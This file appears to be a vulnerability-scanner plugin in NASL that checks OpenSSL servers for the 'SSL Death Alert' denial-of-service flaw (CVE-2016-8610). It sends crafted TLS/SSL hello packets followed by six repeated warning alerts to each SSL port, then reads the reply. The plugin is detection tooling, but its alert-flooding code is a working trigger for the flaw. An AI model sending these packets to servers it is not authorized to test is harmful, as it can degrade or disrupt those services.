include("compat.inc");

if (description)
{
  script_id(51799014);
  script_version("$Revision: 1.7 $");
  script_cvs_date("$Date: 2017/01/16 14:51:33 $");

  script_cve_id("CVE-2016-8610");
  script_bugtraq_id(93841);

  script_name(english:"OpenSSL Death Alert Denial of Service Vulnerability(POC)");
  script_summary(english:"Performs a banner check.");

  script_set_attribute(attribute:"synopsis", value:
"This host is running OpenSSL and is prone to a denial of service vulnerability.");
  script_set_attribute(attribute:"description", value:
"The flaw is due to an error in function
'ssl3_read_bytes' in ssl/s3_pkt.c script which might lead to higher CPU usage
due to improper handling of warning packets.");
  script_set_attribute(attribute:"see_also", value:"http://seclists.org/oss-sec/2016/q4/224");
  script_set_attribute(attribute:"see_also", value:"https://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=af58be768ebb690f78530f796e92b8ae5c9a4401");
  script_set_attribute(attribute:"see_also", value:"https://securingtomorrow.mcafee.com/mcafee-labs/ssl-death-alert-cve-2016-8610-can-cause-denial-of-service-to-openssl-servers");
  script_set_attribute(attribute:"solution", value:
"Upgrade to OpenSSL version 1.0.2j or 1.1.0bor later.");

  script_set_attribute(attribute:"risk_factor", value: "High" );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/01/16");
  #script_set_attribute(attribute:"patch_publication_date", value:"2016/08/24");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/01/16");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:openssl:openssl");
  script_set_attribute(attribute:"in_the_news", value:"true");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Denial of Service");

  script_copyright(english:"This script is Copyright (C) 2016-2017 WebRAY, Inc.");

  script_dependencies("ssl_supported_versions.nasl");
  script_require_keys("Transport/SSL");
  script_require_keys("SSL/Supported");
  script_require_keys("openssl/port");

  exit(0);
}

include("global_settings.inc");
include("dump.inc");
include("audit.inc");
include("misc_func.inc");
include("byte_func.inc");
include("ssl_funcs.inc");

set_byte_order(BYTE_ORDER_BIG_ENDIAN);

ports = get_ssl_ports(fork:false, starttls:false);
if (isnull(ports) || max_index(ports) <= 0) exit(0, "There is no ssl ports.");

foreach port (ports)
{
	protos = get_kb_list("SSL/Transport/" + port);
    if (isnull(protos)) exit(0, "This no ssl transport protocols.");
	protos = make_list(protos);
    if (isnull(protos) || max_index(protos) <= 0) exit(0, "This no ssl transport protocols.");

	foreach proto (protos)
	{

	if (proto == COMPAT_ENCAPS_TLSv12)
	{
		p_hello = raw_string(0x16,0x03,0x03,0x00,0x8a,0x01,0x00,0x00,0x86,0x03,0x03,0x08,0x87,0x37,0x72,0xa4,
		0xc5,0xb7,0xee,0x72,0x1a,0x28,0x52,0x95,0x5f,0x4e,0x8b,0x80,0x33,0x6e,0x27,0x49,
		0x85,0x33,0x61,0xa7,0xeb,0xbe,0x70,0xc7,0x85,0xab,0x5b,0x00,0x00,0x3e,0xc0,0x14,
		0xc0,0x0a,0x00,0x39,0x00,0x38,0x00,0x37,0x00,0x36,0x00,0x88,0x00,0x87,0x00,0x86,
		0x00,0x85,0xc0,0x0f,0xc0,0x05,0x00,0x35,0x00,0x84,0xc0,0x13,0xc0,0x09,0x00,0x33,
		0x00,0x32,0x00,0x31,0x00,0x30,0x00,0x45,0x00,0x44,0x00,0x43,0x00,0x42,0xc0,0x0e,
		0xc0,0x04,0x00,0x2f,0x00,0x41,0x00,0x05,0x00,0x04,0x00,0xff,0x01,0x00,0x00,0x1f,
		0x00,0x0b,0x00,0x04,0x03,0x00,0x01,0x02,0x00,0x0a,0x00,0x0a,0x00,0x08,0x00,0x17,
		0x00,0x19,0x00,0x18,0x00,0x16,0x00,0x23,0x00,0x00,0x00,0x0f,0x00,0x01,0x01);
		p_alert = raw_string(0x15,0x03,0x03,0x00,0x02,0x01,0x2e);
		p_match = raw_string(0x15,0x03,0x03,0x00,0x02,0x02,0x0a);
		break;
	}
	else if (proto == COMPAT_ENCAPS_TLSv11)
	{
		p_hello = raw_string(0x16,0x03,0x02,0x00,0x8a,0x01,0x00,0x00,0x86,0x03,0x02,0x08,0x87,0x37,0x72,0xa4,
		0xc5,0xb7,0xee,0x72,0x1a,0x28,0x52,0x95,0x5f,0x4e,0x8b,0x80,0x33,0x6e,0x27,0x49,
		0x85,0x33,0x61,0xa7,0xeb,0xbe,0x70,0xc7,0x85,0xab,0x5b,0x00,0x00,0x3e,0xc0,0x14,
		0xc0,0x0a,0x00,0x39,0x00,0x38,0x00,0x37,0x00,0x36,0x00,0x88,0x00,0x87,0x00,0x86,
		0x00,0x85,0xc0,0x0f,0xc0,0x05,0x00,0x35,0x00,0x84,0xc0,0x13,0xc0,0x09,0x00,0x33,
		0x00,0x32,0x00,0x31,0x00,0x30,0x00,0x45,0x00,0x44,0x00,0x43,0x00,0x42,0xc0,0x0e,
		0xc0,0x04,0x00,0x2f,0x00,0x41,0x00,0x05,0x00,0x04,0x00,0xff,0x01,0x00,0x00,0x1f,
		0x00,0x0b,0x00,0x04,0x03,0x00,0x01,0x02,0x00,0x0a,0x00,0x0a,0x00,0x08,0x00,0x17,
		0x00,0x19,0x00,0x18,0x00,0x16,0x00,0x23,0x00,0x00,0x00,0x0f,0x00,0x01,0x01);
		p_alert = raw_string(0x15,0x03,0x02,0x00,0x02,0x01,0x2e);
		p_match = raw_string(0x15,0x03,0x02,0x00,0x02,0x02,0x0a);
		break;
	}
	else if (proto == COMPAT_ENCAPS_TLSv10)
	{
		p_hello = raw_string(0x16,0x03,0x01,0x00,0x8a,0x01,0x00,0x00,0x86,0x03,0x01,0x08,0x87,0x37,0x72,0xa4,
		0xc5,0xb7,0xee,0x72,0x1a,0x28,0x52,0x95,0x5f,0x4e,0x8b,0x80,0x33,0x6e,0x27,0x49,
		0x85,0x33,0x61,0xa7,0xeb,0xbe,0x70,0xc7,0x85,0xab,0x5b,0x00,0x00,0x3e,0xc0,0x14,
		0xc0,0x0a,0x00,0x39,0x00,0x38,0x00,0x37,0x00,0x36,0x00,0x88,0x00,0x87,0x00,0x86,
		0x00,0x85,0xc0,0x0f,0xc0,0x05,0x00,0x35,0x00,0x84,0xc0,0x13,0xc0,0x09,0x00,0x33,
		0x00,0x32,0x00,0x31,0x00,0x30,0x00,0x45,0x00,0x44,0x00,0x43,0x00,0x42,0xc0,0x0e,
		0xc0,0x04,0x00,0x2f,0x00,0x41,0x00,0x05,0x00,0x04,0x00,0xff,0x01,0x00,0x00,0x1f,
		0x00,0x0b,0x00,0x04,0x03,0x00,0x01,0x02,0x00,0x0a,0x00,0x0a,0x00,0x08,0x00,0x17,
		0x00,0x19,0x00,0x18,0x00,0x16,0x00,0x23,0x00,0x00,0x00,0x0f,0x00,0x01,0x01);
		p_alert = raw_string(0x15,0x03,0x01,0x00,0x02,0x01,0x2e);
		//p_match = raw_string(0x15,0x03,0x01,0x00,0x02,0x02,0x0a);
		//p_match = raw_string(0x15,0x03,0x01,0x00,0x02,0x02,0x46);
		p_match = raw_string(0x15,0x03,0x01,0x00,0x02,0x02);
		break;
	}
	else if (proto == ENCAPS_SSLv3)
	{
		p_hello = raw_string(0x16,0x03,0x00,0x00,0x8a,0x01,0x00,0x00,0x86,0x03,0x00,0x08,0x87,0x37,0x72,0xa4,
		0xc5,0xb7,0xee,0x72,0x1a,0x28,0x52,0x95,0x5f,0x4e,0x8b,0x80,0x33,0x6e,0x27,0x49,
		0x85,0x33,0x61,0xa7,0xeb,0xbe,0x70,0xc7,0x85,0xab,0x5b,0x00,0x00,0x3e,0xc0,0x14,
		0xc0,0x0a,0x00,0x39,0x00,0x38,0x00,0x37,0x00,0x36,0x00,0x88,0x00,0x87,0x00,0x86,
		0x00,0x85,0xc0,0x0f,0xc0,0x05,0x00,0x35,0x00,0x84,0xc0,0x13,0xc0,0x09,0x00,0x33,
		0x00,0x32,0x00,0x31,0x00,0x30,0x00,0x45,0x00,0x44,0x00,0x43,0x00,0x42,0xc0,0x0e,
		0xc0,0x04,0x00,0x2f,0x00,0x41,0x00,0x05,0x00,0x04,0x00,0xff,0x01,0x00,0x00,0x1f,
		0x00,0x0b,0x00,0x04,0x03,0x00,0x01,0x02,0x00,0x0a,0x00,0x0a,0x00,0x08,0x00,0x17,
		0x00,0x19,0x00,0x18,0x00,0x16,0x00,0x23,0x00,0x00,0x00,0x0f,0x00,0x01,0x01);

		p_alert = raw_string(0x15,0x03,0x00,0x00,0x02,0x01,0x2e);
		p_match = raw_string(0x15,0x03,0x00,0x00,0x02,0x02,0x28);
		break;
	}
	else
	{
		# exit(0, "This no ssl transport protocols.");
		continue;
	}
	}

	if(isnull(p_alert)) exit(0, "This no ssl transport protocols.");

	p_alert = p_alert + p_alert + p_alert + p_alert + p_alert + p_alert;

	soc = open_sock_tcp(port, transport:ENCAPS_IP);
	if (!soc) audit(AUDIT_SOCK_FAIL, port);
	# display("[x] Send client hello\n");
	send(socket:soc, data:p_hello, length:strlen(p_hello));
	# display("[x] Recved server hello\n");
	while(true)
	{
		buff = recv(socket:soc, length:1024, timeout:5);
		if (strlen(buff) <= 0) break;
	}

	# display("[x] Send alert*6\n");
	send(socket:soc, data:p_alert, length:strlen(p_alert));
	# display("[x] Receive\n");
	all = "";
	while(true)
	{
		buff = recv(socket:soc, length:1024, timeout:5);
		# display("RecvLen: ", strlen(buff), "\n");
		# display("RecvData: ", hexstr(buff), "\n");
		if (strlen(buff) <= 0) break;
		all = all + buff;
	}
	# display("[x] Close\n");
	close(soc);

	if(strlen(all) <= 0)
	{
		# display("AllLen: ", strlen(all), "\n");
		exit(0, "has been patched!");
	}

	if(strlen(all) > 7)
	{
		all = substr(all, strlen(all)-7);
	}
	# display("RecvData: ", hexstr(all), "\n");
	if (p_match >!< all)
	{
		security_report_v4(port:port, severity:SECURITY_HOLE, extra:"The ssl ports " + port + " is not patched, because when we send 6 alert, wen can't recveived any error packet!");
	}
	else continue;
}

exit(0);
